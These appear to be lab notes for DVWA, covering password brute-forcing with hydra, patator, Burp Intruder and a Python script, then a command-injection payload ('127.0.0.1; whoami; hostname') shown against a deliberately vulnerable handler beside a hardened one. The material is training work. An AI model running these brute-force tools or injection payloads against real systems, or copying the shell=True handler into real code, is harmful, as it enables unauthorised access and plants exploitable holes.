https://www.youtube.com/watch?v=6EbdPO3nPmo
Hydra (failed)
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt "http-get-form://10.1.1.92/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:PHPSESSID=4h0uedpbegdva5blbjtm85o5iq; security=low" -V -t4
Two things to check against hydra's documented http-get-form syntax before blaming the tool: the URL field must not end in "?" (hydra inserts the "?" between the URL and the form parameters itself, so with a trailing "?" the first query parameter is sent as "?username" rather than "username"), and colons inside a header value should be escaped as "\:". The same attack in the documented target + module form, with the failure string marked F= and a current PHPSESSID:
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.1.1.92 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie\: security=low; PHPSESSID=4h0uedpbegdva5blbjtm85o5iq" -V -t4
Patator
$ patator http_fuzz url="http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
19:23:33 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.8.6 at 2020-11-23 19:23 AEST
19:23:34 patator INFO -
19:23:34 patator INFO - code size:clen time | candidate | num | mesg
19:23:34 patator INFO - -----------------------------------------------------------------------------
19:23:34 patator INFO - 200 4547:4275 0.004 | password | 4 | HTTP/1.1 200 OK
Burp Suite
Proxy > Intercept tab
Attempt login with user:password
Proxy > HTTP history tab
Find the GET request for the login attempt
Check the details: the username, password and Login query parameters, and the security=low and PHPSESSID cookies.
Right click the line, or click Actions, then Send to Intruder
Intruder > Positions tab. Set the payload positions (mark only the password value; the username stays fixed as admin)
Intruder > Payloads tab. Load rockyou.txt
Start attack!
Review the results. Look for different status codes or length.
Payload "password" has length 4566.
Check in the browser.
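The three tools above all do the same thing: one GET per candidate with the session cookies attached, and a hit decided either by the failure string being absent (patator's fgrep filter, hydra's condition string) or by a changed response length at the same status code (Burp). As an added example, not from the video or these notes, here is a minimal Python brute-forcer that makes that logic explicit. fake_dvwa is a constructed stand-in for the lab page so the loop can run offline; the URL, cookie names and wordlist path in the main block are the lab values from the notes, and the PHPSESSID placeholder is an assumption (use a current logged-in session).

```python
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional, Tuple

# Failure string shown by DVWA's brute/ page; its absence is the hit condition,
# the same thing patator's -x ignore:fgrep= and hydra's condition string key on.
FAIL_STRING = "Username and/or password incorrect."

# A transport takes the query parameters and cookies for one attempt and returns
# (status_code, body_text). Keeping it pluggable lets the same loop run against
# the lab host or against the offline stand-in below.
Transport = Callable[[Dict[str, str], Dict[str, str]], Tuple[int, str]]


def http_get_transport(base_url: str) -> Transport:
    """Real transport: one GET per candidate, cookies (security=low, PHPSESSID) sent verbatim."""
    def send(params: Dict[str, str], cookies: Dict[str, str]) -> Tuple[int, str]:
        url = base_url + "?" + urllib.parse.urlencode(params)
        cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
        req = urllib.request.Request(url, headers={"Cookie": cookie_header})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    return send


def fake_dvwa(params: Dict[str, str], cookies: Dict[str, str]) -> Tuple[int, str]:
    """Constructed stand-in for DVWA brute/ at security=low (not the real application).

    Every attempt answers 200 and a hit differs only in the body, which is why the
    status code alone tells you nothing and a string match or length diff is needed.
    """
    page = "<html><body><h1>Vulnerability: Brute Force</h1>{}</body></html>"
    if (cookies.get("security") == "low"
            and params.get("username") == "admin"
            and params.get("password") == "password"):
        return 200, page.format('<p>Welcome to the password protected area admin</p>'
                                '<img src="hackable/users/admin.jpg" />')
    return 200, page.format("<pre><br />Username and/or password incorrect.</pre>")


def brute_force(username: str, wordlist: Iterable[str], send: Transport,
                cookies: Dict[str, str], fail_string: str = FAIL_STRING) -> Optional[dict]:
    """Try each candidate in order; return details of the first response lacking fail_string.

    The first response's body length is kept as a baseline so the hit can be compared
    the way the Burp Intruder step does (same status, different length).
    """
    baseline_len = None
    for attempt, candidate in enumerate(wordlist, start=1):
        status, body = send({"username": username, "password": candidate, "Login": "Login"},
                            cookies)
        if baseline_len is None:
            baseline_len = len(body)  # almost always a failed attempt, so a fair baseline
        if fail_string not in body:
            return {"password": candidate, "attempt": attempt, "status": status,
                    "length": len(body), "baseline_length": baseline_len}
    return None


if __name__ == "__main__":
    # Lab values from the notes above; PHPSESSID is a placeholder for a current session.
    cookies = {"security": "low", "PHPSESSID": "<current session id>"}
    send = http_get_transport("http://10.1.1.92/vulnerabilities/brute/")
    with open("/usr/share/wordlists/rockyou.txt", encoding="latin-1") as f:
        hit = brute_force("admin", (line.rstrip("\n") for line in f), send, cookies)
    print(hit)
```

Against the stand-in, "password" is the fourth candidate of rockyou's first five entries, which matches the "password | 4" line in the patator output above.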
Remotely, find out which OS user the web service runs as, as well as the machine's hostname, via RCE.
A semicolon can be used to chain multiple commands, e.g. whoami; hostname after the value the page expects.
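Added example (not from the video or these notes) of why the semicolon works: a constructed stand-in for a server-side handler that concatenates the form value into a shell command line (a ping helper is assumed here as the command; the page does not name the endpoint) beside a hardened version that validates the value as an IP address and passes it as a separate argv element with no shell. The base command is a parameter so the chaining can be shown with a harmless command instead of a real ping.

```python
import ipaddress
import shlex
import subprocess


def vulnerable_ping(target: str, base_cmd: str = "ping -c 1") -> str:
    """Constructed vulnerable handler: the user-supplied target is glued onto a
    command string and handed to /bin/sh. ';' ends the intended command and starts
    another (so do '&&', '||', '|' and backticks), and because ';' is unconditional
    the injected command runs even when the intended one fails."""
    cmd = f"{base_cmd} {target}"  # no validation, no quoting
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=30)
    return proc.stdout + proc.stderr


def validate_target(target: str) -> str:
    """Accept only a literal IPv4/IPv6 address; anything else, including a ';', is rejected."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}") from None


def safe_ping(target: str, base_cmd: str = "ping -c 1") -> str:
    """Hardened handler: validated value, argv list, no shell, so metacharacters are inert."""
    ip = validate_target(target)
    argv = shlex.split(base_cmd) + [ip]
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # The payload from the notes: a valid-looking value, then the chained commands.
    payload = "127.0.0.1; whoami; hostname"
    print("vulnerable handler output:\n" + vulnerable_ping(payload))
    try:
        safe_ping(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
```

Run it and the vulnerable handler prints the ping output followed by the web service's user and the hostname, while the hardened one refuses the value before any command runs.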